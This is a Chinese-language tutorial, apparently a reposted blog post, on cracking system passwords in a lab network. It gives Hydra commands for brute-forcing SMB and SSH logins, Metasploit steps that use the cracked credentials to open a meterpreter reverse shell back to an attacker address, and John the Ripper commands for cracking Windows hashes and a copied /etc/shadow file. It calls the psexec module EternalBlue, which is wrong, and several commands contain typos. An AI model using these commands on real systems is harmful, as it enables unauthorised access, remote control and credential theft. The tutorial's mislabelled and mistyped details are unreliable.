1.1、windows系統口令遠程爆破(smb服務,445埠)
命令:hydra -l administrator -P pwd.dic smb://10.211.55.8 -vV -f -e nsr
決議:-l指定用戶名,-L指定用戶名字典,-p指定密碼,-P指定密碼字典,-vV顯示爆破細節,-o將爆破結果保存到檔案,-f只要找到正確密碼就停止爆破,-t指定執行緒數量,默認16,-e(n、s、r)n:null,s:same、r:反向
創建用戶名和口令檔案:
vim user.dic
vim pwd.dic
暴力破解成功,用戶名qin,密碼1221
使用永恒之藍嘗試連接:
命令:msfconsole
執行:use exploit/windows/smb/psexec_psh
執行命令:set payload windows/x64/meterpreter/reverse_tcp
執行命令,設定遠程目標:set RHOSTS 10.211.55.8
執行命令,設定用戶名:set SMBUSER qin
執行命令,設定密碼:set SMBPASS 1221
執行命令,設定本機地址:set LHOST 10.211.55.12
執行命令,攻擊:exploit
6.2、Linux系統口令遠程爆破(ssh服務,22埠)
主要爆破ssh服務
命令:hydra -L user.dic -P pwd.dic sssh://10.211.55.6 -vV -f -t64 -ensr
暴力破解成功,用戶名root,密碼Aa123123.
6.3、windows系統本地爆破
6.3.1、從記憶體中讀取windows密碼
6.3.2、windows的hash值破解(kali)
命令:john win2k8.hash --format-NT --wordlist=/root/dic/winPass.dic
解釋:win2k8.hash是存hash的檔案,--worldlist可選引數,如果不寫就會用默認字典爆破
6.4、Linux系統本地爆破
拷貝shadow檔案:cp /etc/shadow ./shadow
命令:john shadow
決議:shadow是拷貝過來的密碼檔案
命令:john --show shadow
決議:查看破解后的檔案
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/400428.html
標籤:其他